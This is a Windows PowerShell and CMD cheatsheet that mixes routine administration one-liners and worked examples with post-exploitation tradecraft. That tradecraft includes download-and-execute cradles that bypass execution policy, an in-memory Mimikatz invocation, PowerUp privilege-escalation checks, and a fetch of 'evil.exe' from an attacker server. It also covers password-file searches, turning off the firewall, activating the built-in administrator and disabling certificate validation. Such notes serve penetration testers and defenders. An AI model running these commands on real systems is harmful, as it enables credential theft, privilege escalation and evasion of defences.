Windows Command Line Cheatsheet


Enable ISE using powershell

In the few months that I've been developing in PowerShell, I've found the ISE incredibly useful. If you land on a new machine and the ISE isn't there, here's how to install it from the PowerShell terminal:

Import-Module ServerManager
Add-WindowsFeature Powershell-ISE

Securely store credentials in XML for Import

Start out by storing your username and password (in a SecureString format) in a PSCredential object:

$cred = Get-Credential

Next, go ahead and export your credentials to an xml file:

$cred | Export-CliXml <location>.clixml

Finally, when you need it, import the credentials from the XML file and store them in a variable ($cred2 in this particular scenario):

$cred2 = Import-CliXml <location>.clixml
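As an added example (not from the original cheatsheet), the round trip below shows what Export-CliXml actually writes and why the file only works for the user who created it: the SecureString is wrapped with DPAPI in current-user scope, so a different account or a different host cannot decrypt it. The file path and the account name are placeholders.

```powershell
# Added example, not from the original cheatsheet: round-trip a PSCredential
# through Export-CliXml / Import-CliXml. Path and account name are placeholders.
$path = Join-Path $env:TEMP 'svc-backup.clixml'

# Prompt once; the password never exists as a plain string inside $cred.
$cred = Get-Credential -UserName 'CORP\svc-backup' -Message 'Enter the service account password'

# The SecureString is serialized with DPAPI (current-user scope), so only the
# same Windows user on the same machine can turn it back into a usable credential.
$cred | Export-CliXml -Path $path

# What is actually on disk: the username in clear text, the password as a DPAPI blob.
Select-String -Path $path -Pattern '<S N="UserName">|<SS N="Password">' |
    ForEach-Object { $_.Line.Trim() }

function Import-StoredCredential {
    param([Parameter(Mandatory)][string]$Path)
    try {
        Import-CliXml -Path $Path
    }
    catch {
        # Import fails with "Key not valid for use in specified state" when a
        # different user or a different host tries to unwrap the DPAPI blob.
        Write-Warning "Cannot decrypt ${Path}: $($_.Exception.Message)"
        $null
    }
}

$cred2 = Import-StoredCredential -Path $path
if ($cred2) {
    "Restored credential for $($cred2.UserName)"
    # Only when an API insists on plaintext: unwrap in memory, use it, discard it.
    $plain = $cred2.GetNetworkCredential().Password
    $plain = $null
}

# Restrict the file to its owner; it is still only as safe as that user's profile.
icacls $path /inheritance:r /grant:r "${env:USERNAME}:(R,W)" | Out-Null
```

Because the protection is tied to the exporting user, a credential file that has to be used by a scheduled task or service must be exported while running as that task's account; copying the file between machines does not work, which is the property that makes this safer than a plaintext config file.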

Command output to file

Append this to whatever you're running to get the output in a text file:

| Out-File <location>

For example, if we want to run Invoke-AllChecks from PowerUp and output in a file called output.txt in C:\temp:

Invoke-AllChecks | Out-File C:\temp\output.txt

Command output to clipboard

Command | Clip

Require powershell script run as admin

Add this to the top of the powershell file: #Requires -RunAsAdministrator


Download file

powershell -exec bypass -c "(New-Object Net.WebClient).DownloadFile('','C:\temp\launcher.bat')"

Download PowerUp with Powershell <= v.2.0

This will get you the PowerUp powershell script and put it in C:\Temp, or some folder that the user you're on has permissions to write to.

You can also modify this snippet to download files if wget isn't available.

$WebClient = New-Object System.Net.WebClient
# <url to PowerUp.ps1> is a placeholder for wherever you host the script
$WebClient.DownloadFile("<url to PowerUp.ps1>", "C:\Temp\PowerUp.ps1")

one-liner alternative:

(New-Object System.Net.WebClient).DownloadFile("","C:\Temp\PowerUp.ps1")

another one:

powershell.exe -ep bypass -c "IEX ((new-object net.webclient).downloadstring(''))"

Another variant, which decodes and executes a base64-encoded PowerShell payload, can be found here.

Using PowerUp

Import-Module c:\PowerUp\PowerUp.ps1
# Run all the checks
Invoke-AllChecks

PowerUp one-liner

Get PowerUp, run it, and output to a text file so we can read the output easily.

powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString(''); Invoke-AllChecks > C:\Temp\PU.txt

Powershell MimiKatz

powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString(''); Invoke-Mimikatz

Tail a logfile

You can effectively tail -f a log file, starting from its last two lines, with the following (note that -Wait blocks until you press Ctrl+C):

Get-Content logfile.log -Tail 2 -Wait
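Added example, not from the original page: the same Get-Content -Wait idiom, but filtered so that only lines matching a watch-list are shown, which is the PowerShell analogue of tail -f app.log | grep -E 'pattern'. The log path, the patterns and the three sample log lines are constructed for the example.

```powershell
# Added example, not from the original page. Writes a few constructed log lines
# first so the script runs as-is, then follows the file and prints only matches.
$log = Join-Path $env:TEMP 'app.log'
"2024-01-01 09:00:01 INFO  service started",
"2024-01-01 09:00:05 WARN  logon failed for user backup from 10.0.0.5",
"2024-01-01 09:00:07 INFO  heartbeat" | Set-Content -Path $log

function Watch-Log {
    param(
        [Parameter(Mandatory)][string]$Path,
        # Case-insensitive regex of the things worth looking at (assumption).
        [string]$Pattern = 'logon failed|access denied|ERROR',
        # 0 = show only lines appended after we start; 2 mirrors the cheatsheet.
        [int]$Tail = 0
    )
    # -Wait keeps the file open and polls for new lines until Ctrl+C.
    Get-Content -Path $Path -Tail $Tail -Wait |
        Where-Object { $_ -match $Pattern } |
        ForEach-Object {
            # Stamp with local time so the console output can itself be kept.
            '{0:s}  {1}' -f (Get-Date), $_
        }
}

# Replay the last two existing lines, then keep watching for new ones.
Watch-Log -Path $log -Tail 2
```

Because -Wait polls the file rather than subscribing to it, it works on any text log, but it only sees appends; a log that is rotated or truncated needs the watcher restarted.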

Run Powershell Script to get around execution of scripts disabled error

powershell -ExecutionPolicy Bypass -File <file>.ps1

Download sysinternals

First, disable certificate validation for this PowerShell process (the callback stays in effect until the session ends, for every HTTPS request it makes):

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

then you can download it (DownloadFile needs a full file path, not a directory):

(New-Object System.Net.WebClient).DownloadFile("","C:\Temp\<filename>")

Useful powershell one-liners:

Get hostname:
hostname

List local accounts on a system:
Get-WmiObject -Class Win32_UserAccount -Filter "LocalAccount='True'"

Check if system is joined to a domain or a workgroup:
if ((gwmi win32_computersystem).partofdomain -eq $true) { write-host -fore green 'This system is on a domain' } else { write-host -fore red 'This system is part of a workgroup' }

Set environment variable (for the current session only)

$env:<NAME> = "<value>"

Show env vars in running script

gci env:* | Sort-Object Name

Check if system is running a desktop version of windows

$windesktop = (gwmi win32_operatingsystem).OperatingSystemSKU -notmatch "(\b[7-9]|10|1[2-5]|1[7-9]|2[0-5])"
if ($windesktop) {
    write-output "OS is a flavor of Windows Desktop"
}
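Added example, not from the original page, covering both the domain/workgroup check and the desktop/server check in one object. Instead of matching the SKU number against a regex, it uses the documented Win32_OperatingSystem.ProductType value (1 = workstation, 2 = domain controller, 3 = server), which is stable across Windows versions.

```powershell
# Added example, not from the original page: host role and domain membership
# in one object, using ProductType rather than the SKU regex.
function Get-HostRole {
    $os = Get-WmiObject -Class Win32_OperatingSystem
    $cs = Get-WmiObject -Class Win32_ComputerSystem
    $role = switch ($os.ProductType) {
        1       { 'Workstation' }
        2       { 'Domain Controller' }
        3       { 'Server' }
        default { "Unknown ($($os.ProductType))" }
    }
    [pscustomobject]@{
        ComputerName      = $cs.Name
        Caption           = $os.Caption
        Version           = $os.Version
        SKU               = $os.OperatingSystemSKU
        Role              = $role
        IsDesktop         = ($os.ProductType -eq 1)
        DomainJoined      = [bool]$cs.PartOfDomain
        # Domain holds the workgroup name when the box is not joined.
        DomainOrWorkgroup = $cs.Domain
    }
}

$info = Get-HostRole
$info | Format-List
if ($info.IsDesktop) { Write-Output 'OS is a flavor of Windows Desktop' }
```

Get-WmiObject is used to stay compatible with the PowerShell 2.0 hosts this cheatsheet targets; on PowerShell 3 and later, Get-CimInstance takes the same class names.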

Get Windows kernel version

(Get-WmiObject Win32_OperatingSystem).Version

Get list of IPv4 addr

(gwmi Win32_NetworkAdapterConfiguration | ? { $_.IPAddress -ne $null }).ipaddress

Change hostname

(Get-WmiObject -Class Win32_ComputerSystem).Rename("<new-hostname>")
# the new name takes effect after a reboot

Log script output to file

Start-Transcript -path c:\windows\temp\interesting.log -Append -force

# do stuff

exit 1001
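Added example, not from the original page: the same Start-Transcript call wrapped in try/catch/finally so that the transcript is closed cleanly and the script still returns a distinct exit code when something throws. The log path and the placeholder work (a Get-Service call) are assumptions.

```powershell
# Added example, not from the original page. Everything written to the console
# between Start-Transcript and Stop-Transcript, including errors, lands in the log.
$logPath = Join-Path $env:windir 'Temp\interesting.log'   # assumed location

Start-Transcript -Path $logPath -Append -Force | Out-Null
$exitCode = 0
try {
    Write-Output "Starting run as $env:USERNAME on $env:COMPUTERNAME"
    # do stuff (placeholder work)
    Get-Service -Name 'WinRM' | Format-List Name, Status
}
catch {
    Write-Warning "Run failed: $($_.Exception.Message)"
    $exitCode = 1001
}
finally {
    # Stop-Transcript flushes and closes the file; without it the tail of the
    # output can be lost when the process exits.
    Stop-Transcript | Out-Null
}
exit $exitCode
```

Because the transcript records commands as well as output, it is also the file to look at after the fact when a run did something unexpected; the -Append switch keeps earlier runs in the same file.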

Download file with wget (PowerShell alias for Invoke-WebRequest)

wget http://<evil server>/evil.exe -Outfile evil.exe

Check Permissions for folder

icacls <path>

Netstat with find

This is the PowerShell equivalent of running netstat and piping the results through grep on Linux. find needs its search string in double quotes, and in PowerShell those quotes have to be escaped with backticks; otherwise the PowerShell parser strips them before find.exe sees them and find throws an error:

netstat -anob  | find `"443`"
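Added example, not from the original page: a PowerShell-native way to get the same information as netstat -anob | find "443", joined with the owning process so you can see which binary holds the socket. Get-NetTCPConnection is available on Windows 8 / Server 2012 and later; the port number is an assumption.

```powershell
# Added example, not from the original page: connections on a port with the
# process that owns each one (requires the NetTCPIP module, Windows 8+/2012+).
function Get-PortOwner {
    param([int]$Port = 443)   # assumed port
    Get-NetTCPConnection |
        Where-Object { $_.LocalPort -eq $Port -or $_.RemotePort -eq $Port } |
        ForEach-Object {
            # Path is empty for system processes or when access is denied.
            $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Local   = "$($_.LocalAddress):$($_.LocalPort)"
                Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
                State   = $_.State
                PID     = $_.OwningProcess
                Process = if ($proc) { $proc.ProcessName } else { '<unknown>' }
                Path    = if ($proc) { $proc.Path } else { $null }
            }
        }
}

Get-PortOwner -Port 443 | Format-Table -AutoSize
```

Because the function returns objects rather than text, the result can be filtered further (for example on State or Path) without any quoting tricks.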

Look for files with passwords:

dir /b /s web.config
dir /b /s unattend.xml
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*

Disable firewall

netsh advfirewall set allprofiles state off

Make administrator user active

net user administrator /active:yes

Set user password to never expire

net user <username> /expires:never /active:yes /logonpasswordchg:no

Useful CMD one-liners:

Open event viewer from cmd:
eventvwr.msc

View the status of a service:
sc query <service name>

Stop service:
sc stop <service name>

Start service:
sc start <service name>

Open services msc:
services.msc

List all the service information for each process:
tasklist /svc

Kill a process by PID:
taskkill /pid <pid> /f

Kill firefox (or any process) by name:
taskkill /im firefox.exe /f

Delete a file:
del <file name>

List drives:
fsutil fsinfo drives

Show users with active sessions:
quser (or query user)

Show active network sessions:
netstat -vb

Get last modified file in a directory (conceptually similar to ls -lart):
dir /O:D /T:W /A:-D

Rename file:
move <file> <new-file-name>

Show contents of file:
type file.txt

Current user and privilege info:
whoami /all

List users:
net users

List domain users and output to a file:
net user /domain > domain-user-list.txt

List domain controller the current system is authenticated with:
echo %LOGONSERVER%

Get FSMO roles for current domain (useful info about domain controller setup):
netdom query fsmo

List all domain controllers in the current domain:
net group "Domain Controllers" /domain

Print password policy:
net accounts

Reboot system:
shutdown -r

Query the registry:
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Remove a key from the registry:
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ /v hFaZvOAsF /f

Show environment variables:
set